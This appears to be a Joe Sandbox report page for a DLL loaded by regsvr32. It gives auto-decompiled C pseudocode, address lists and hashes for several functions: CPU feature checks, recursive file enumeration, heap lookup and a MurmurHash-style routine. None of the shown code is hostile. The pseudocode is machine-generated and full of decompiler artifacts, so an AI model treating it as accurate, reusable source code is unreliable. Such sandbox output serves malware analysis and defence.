Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 18db988838531f9f93388b7ebc2c987d74febbe3873d3a42121421e94759637c
Instruction ID: 24c820608a1bb22c66f8b19d4a1f62b62d5694c93de46927e96c7c6a903bc548
Opcode Fuzzy Hash: 18db988838531f9f93388b7ebc2c987d74febbe3873d3a42121421e94759637c
Instruction Fuzzy Hash: EAB17971220609DFEB04CF68C596B957BA0FF55364F258658E8A9CF2A1C336E993CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E9658 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E9E9658(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6e9fcff0 =  *0x6e9fcff0 & 0x00000000;
				 *0x6e9fc010 =  *0x6e9fc010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6e9fcff4; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6e9fcff4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6e9fc010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x6e9fcff0 = 1;
					 *0x6e9fc010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6e9fcff0 = 2;
						 *0x6e9fc010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6e9fc010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x6e9fcff0 = 3;
								 *0x6e9fc010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6e9fcff0 = 5;
									 *0x6e9fc010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6e9fc010 =  *0x6e9fc010 | 0x00000040;
										 *0x6e9fcff0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6e9fcff4; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6e9fcff4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x6e9e9658
0x6e9e965b
0x6e9e9665
0x6e9e9676
0x6e9e9825
0x6e9e9828
0x6e9e9828
0x6e9e967c
0x6e9e9682
0x6e9e9687
0x6e9e968b
0x6e9e968f
0x6e9e9690
0x6e9e9692
0x6e9e9695
0x6e9e969a
0x6e9e96a3
0x6e9e96b4
0x6e9e96bf
0x6e9e96c5
0x6e9e96c6
0x6e9e96cb
0x6e9e96ce
0x6e9e96d3
0x6e9e96db
0x6e9e96de
0x6e9e96e1
0x6e9e9726
0x6e9e9726
0x6e9e972c
0x6e9e972c
0x6e9e9731
0x6e9e9732
0x6e9e9738
0x6e9e9769
0x6e9e973a
0x6e9e973c
0x6e9e973d
0x6e9e9742
0x6e9e9745
0x6e9e9747
0x6e9e974a
0x6e9e974d
0x6e9e9750
0x6e9e9753
0x6e9e975c
0x6e9e9761
0x6e9e9761
0x6e9e975c
0x6e9e976c
0x6e9e9771
0x6e9e9774
0x6e9e977e
0x6e9e9789
0x6e9e978f
0x6e9e9792
0x6e9e979c
0x6e9e97a7
0x6e9e97b3
0x6e9e97b6
0x6e9e97b9
0x6e9e97c4
0x6e9e97c9
0x6e9e97cb
0x6e9e97d0
0x6e9e97d3
0x6e9e97dd
0x6e9e97e5
0x6e9e97ea
0x6e9e97f4
0x6e9e9802
0x6e9e9815
0x6e9e981c
0x6e9e981c
0x6e9e9802
0x6e9e97e5
0x6e9e97c9
0x6e9e97a7
0x00000000
0x6e9e9824
0x6e9e96e6
0x6e9e96f0
0x6e9e9715
0x6e9e971b
0x6e9e971e
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E9E966E

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5e89ef757747ddb97d5717dcf390b595cf8c54da9f5e08eaaf2618cb1a40692d
Instruction ID: f510cd8d4c1f07cf4c806ea8436c2741e84a76b272c6735d47bb0411187e06c9
Opcode Fuzzy Hash: 5e89ef757747ddb97d5717dcf390b595cf8c54da9f5e08eaaf2618cb1a40692d
Instruction Fuzzy Hash: CE5198B1A246068BEB1ACF95E4817AEBBF4FF49304F1485AAC526EB340D375D940CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EED8A Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E9EED8A(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E6E9EDC48(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E6E9F2161(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E6E9EF185(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6E9EDC0E(_t165);
								_t167 = _v8;
							}
							E6E9EDC0E(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E6E9F2161(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6E9EC27C();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x6e9fc024; // 0x45ebcfb3
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E6E9F21B0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E6E9EEB7E(_t138 - _t160 + 1, _t160,  &_v672, E6E9EF092(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E6E9EEAAF( &(_v604.cFileName),  &_v636,  &_v605, E6E9EF092(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E6E9EED8A(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E6E9EDC0E(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E6E9EDC0E(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E6E9F1BC0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E6E9EE9E5);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E6E9EED8A( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E6E9EDC0E(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E6E9EED8A(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E6E9E9ADF(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x6e9eed8f
0x6e9eed90
0x6e9eed93
0x6e9eed93
0x6e9eed96
0x6e9eed96
0x6e9eed98
0x6e9eed99
0x6e9eed9e
0x6e9eeda5
0x6e9eeda8
0x6e9eedad
0x6e9eedb6
0x6e9eedb7
0x6e9eedba
0x6e9eedc4
0x6e9eedc8
0x6e9eedca
0x6e9eedde
0x6e9eedde
0x6e9eede1
0x6e9eedeb
0x6e9eedf0
0x6e9eedf3
0x6e9eedf5
0x00000000
0x6e9eedf7
0x6e9eedf7
0x6e9eedfc
0x6e9eee03
0x6e9eee06
0x6e9eee08
0x6e9eee19
0x6e9eee1b
0x6e9eee1d
0x6e9eee1d
0x6e9eee1d
0x6e9eee0a
0x6e9eee0b
0x6e9eee10
0x6e9eee13
0x6e9eee22
0x6e9eee28
0x00000000
0x6e9eee2b
0x6e9eedcc
0x6e9eedcc
0x6e9eedd2
0x6e9eedd7
0x6e9eedda
0x6e9eeddc
0x6e9eee2e
0x6e9eee30
0x6e9eee31
0x6e9eee32
0x6e9eee33
0x6e9eee34
0x6e9eee35
0x6e9eee3a
0x6e9eee3e
0x6e9eee40
0x6e9eee46
0x6e9eee4d
0x6e9eee50
0x6e9eee53
0x6e9eee56
0x6e9eee57
0x6e9eee58
0x6e9eee5b
0x6e9eee61
0x6e9eee63
0x6e9eee65
0x6e9eee65
0x6e9eee67
0x6e9eee69
0x00000000
0x00000000
0x6e9eee6b
0x6e9eee6d
0x6e9eee6f
0x6e9eee71
0x6e9eee7c
0x6e9eee7e
0x6e9eee80
0x00000000
0x00000000
0x6e9eee80
0x6e9eee71
0x00000000
0x6e9eee6d
0x6e9eee82
0x6e9eee82
0x6e9eee88
0x6e9eee8a
0x6e9eee90
0x6e9eee92
0x6e9eeeb4
0x6e9eeeb4
0x6e9eeeb6
0x6e9eeeb8
0x6e9eeec4
0x6e9eeec4
0x6e9eeeba
0x6e9eeeba
0x6e9eeebc
0x00000000
0x6e9eeebe
0x6e9eeebe
0x6e9eeec0
0x6e9eeec2
0x00000000
0x00000000
0x6e9eeec2
0x6e9eeebc
0x6e9eeecc
0x6e9eeed4
0x6e9eeeda
0x6e9eeedb
0x6e9eeedd
0x6e9eeee5
0x6e9eeeeb
0x6e9eeef1
0x6e9eeef7
0x6e9eef0b
0x6e9eef10
0x6e9eef1b
0x6e9eef31
0x6e9eef33
0x6e9eef36
0x6e9eef59
0x6e9eef59
0x6e9eef5b
0x6e9eef5e
0x6e9eef64
0x6e9eef64
0x6e9eef6a
0x6e9eef70
0x6e9eef76
0x6e9eef7c
0x6e9eef82
0x6e9eefa3
0x6e9eefa8
0x6e9eefad
0x6e9eefb1
0x6e9eefb7
0x6e9eefba
0x6e9eefcd
0x6e9eefcd
0x6e9eefdb
0x6e9eefe0
0x6e9eefe3
0x6e9eefe9
0x6e9eefeb
0x6e9ef049
0x6e9ef04f
0x6e9ef057
0x6e9ef05c
0x6e9ef062
0x6e9ef063
0x00000000
0x00000000
0x00000000
0x6e9eefbc
0x6e9eefbc
0x6e9eefbf
0x6e9eefc1
0x00000000
0x6e9eefc3
0x6e9eefc3
0x6e9eefc6
0x00000000
0x6e9eefc8
0x6e9eefc8
0x6e9eefcb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eefcb
0x6e9eefc6
0x6e9eefc1
0x6e9ef065
0x6e9ef066
0x00000000
0x6e9eefed
0x6e9eefed
0x6e9eeff3
0x6e9eeffb
0x6e9ef000
0x6e9ef000
0x6e9ef00f
0x6e9ef00f
0x6e9ef017
0x6e9ef01d
0x6e9ef023
0x6e9ef02a
0x6e9ef02d
0x6e9ef02f
0x6e9ef03f
0x6e9ef044
0x00000000
0x6e9eef38
0x6e9eef38
0x6e9eef49
0x6e9eef49
0x6e9ef06c
0x6e9ef06c
0x6e9ef073
0x6e9ef074
0x6e9ef07c
0x6e9ef081
0x6e9ef082
0x6e9eee94
0x6e9eee97
0x6e9eee99
0x6e9eeeae
0x00000000
0x6e9eee9b
0x6e9eee9b
0x6e9eeea1
0x6e9eeea6
0x6e9eee99
0x6e9ef087
0x6e9ef088
0x6e9ef08a
0x6e9ef091
0x00000000
0x00000000
0x00000000
0x6e9eeddc
0x6e9eedaf
0x6e9eedb1
0x6e9eedb2
0x6e9eedb4
0x6e9eedb4

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87635bd228e0d5d0f6041a31450a79ad8cf1f669e9806e15bf7f368ba9ce3e63
Instruction ID: 6837f79aadd4006e297e83a43faa0ff2430ebda3b163d3316208abb56a09e16b
Opcode Fuzzy Hash: 87635bd228e0d5d0f6041a31450a79ad8cf1f669e9806e15bf7f368ba9ce3e63
Instruction Fuzzy Hash: D14191B5C04219AEDB15CFA9CC88AEABBBDAF85304F1446DDE51DE3200DA31DE848F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EFE17 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EFE17() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x6e9fd9d8 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x6e9efe17
0x6e9efe1f
0x6e9efe27

APIs

GetProcessHeap.KERNEL32 ref: 6E9EFE17

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 435e0ad379f7b39f371149c364294953c2d7db2ec8425a394c944e5a3f618309
Instruction ID: 867d6837f88125b85f4e104aec9cec090dc863fc8119897fae785fffb38cbdef
Opcode Fuzzy Hash: 435e0ad379f7b39f371149c364294953c2d7db2ec8425a394c944e5a3f618309
Instruction Fuzzy Hash: 72A001B060AA018B9B508F75A6893093AA9AF466D5719806AA54AC9251EB2488909A41

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E8C90 Relevance: .1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E9E8C90(signed char* _a4, signed int _a8, unsigned int _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;

				_v32 = 0x5bd1e995;
				_v36 = 0x18;
				_v20 = _a8;
				_v24 = _a4;
				_v8 = _a12;
				while(_a8 >= 4) {
					_v16 =  *_v24;
					_v16 = _v16 * 0x5bd1e995;
					_v16 = _v16 >> 0x00000018 ^ _v16;
					_v16 = _v16 * 0x5bd1e995;
					_v8 = _v8 * 0x5bd1e995;
					_v8 = _v8 ^ _v16;
					_v24 =  &(_v24[4]);
					_a8 = _a8 - 4;
				}
				_v12 = 0;
				_v28 = _a8;
				if(_v28 == 1) {
					L9:
					_v12 =  *_v24 & 0x000000ff ^ _v12;
				} else {
					if(_v28 == 2) {
						L8:
						_v12 = (_v24[1] & 0x000000ff) << 0x00000008 ^ _v12;
						goto L9;
					} else {
						if(_v28 == 3) {
							_v12 = ( *(_v24 + (1 << 1)) & 0x000000ff) << 0x00000010 ^ _v12;
							goto L8;
						} else {
						}
					}
				}
				_v12 = _v12 * 0x5bd1e995;
				_v12 = _v12 >> 0x00000018 ^ _v12;
				_v12 = _v12 * 0x5bd1e995;
				_v8 = _v8 * 0x5bd1e995;
				_v8 = _v8 ^ _v12;
				_v20 = _v20 * 0x5bd1e995;
				_v20 = _v20 >> 0x00000018 ^ _v20;
				_v20 = _v20 * 0x5bd1e995;
				_v8 = _v8 * 0x5bd1e995;
				_v8 = _v8 ^ _v20;
				_v8 = _v8 >> 0x0000000d ^ _v8;
				_v8 = _v8 * 0x5bd1e995;
				_v8 = _v8 >> 0x0000000f ^ _v8;
				return _v8;
			}

0x6e9e8c96
0x6e9e8c9d
0x6e9e8ca7
0x6e9e8cad
0x6e9e8cb3
0x6e9e8cb6
0x6e9e8cc1
0x6e9e8ccb
0x6e9e8cd7
0x6e9e8ce1
0x6e9e8ceb
0x6e9e8cf4
0x6e9e8cfd
0x6e9e8d06
0x6e9e8d06
0x6e9e8d0b
0x6e9e8d15
0x6e9e8d1c
0x6e9e8d5b
0x6e9e8d6d
0x6e9e8d1e
0x6e9e8d22
0x6e9e8d43
0x6e9e8d58
0x00000000
0x6e9e8d24
0x6e9e8d28
0x6e9e8d40
0x00000000
0x00000000
0x6e9e8d2a
0x6e9e8d28
0x6e9e8d22
0x6e9e8d77
0x6e9e8d83
0x6e9e8d8d
0x6e9e8d97
0x6e9e8da0
0x6e9e8daa
0x6e9e8db6
0x6e9e8dc0
0x6e9e8dca
0x6e9e8dd3
0x6e9e8ddf
0x6e9e8de9
0x6e9e8df5
0x6e9e8dfe

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
Instruction ID: 56df549dca56209b34109c28b2645b44d3bcda41dd745ec47cbaf65b0c175d79
Opcode Fuzzy Hash: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
Instruction Fuzzy Hash: E9519BB0D00219EFCB48CF99D6919AEFBB5EF49300F2085AAD951AB350D734AB41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EE9B4 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EE9B4(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6E9EDE3D(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6e9ee9c1
0x6e9ee9c3
0x6e9ee9c6
0x6e9ee9c9
0x6e9ee9cc
0x6e9ee9dd
0x6e9ee9df
0x6e9ee9ce
0x6e9ee9d2
0x6e9ee9db
0x00000000
0x00000000
0x6e9ee9db
0x6e9ee9e4

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d29695600689807b11558e5c6e6a4222949c1000ade68193d81d4f01b1a44bb
Instruction ID: d81de2419f0a2210c86039b1835a478a3187b1752e26c290517f223a240a7879
Opcode Fuzzy Hash: 8d29695600689807b11558e5c6e6a4222949c1000ade68193d81d4f01b1a44bb
Instruction Fuzzy Hash: 80E08C33911238EBCB12CBD8C904A8AB3ECEF84A40B1108ABB601D3610C370DE00CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E83B0 Relevance: .0, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E83B0() {

				return  *((intOrPtr*)( *[fs:0x30] + 0x18));
			}

0x6e9e83bd

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
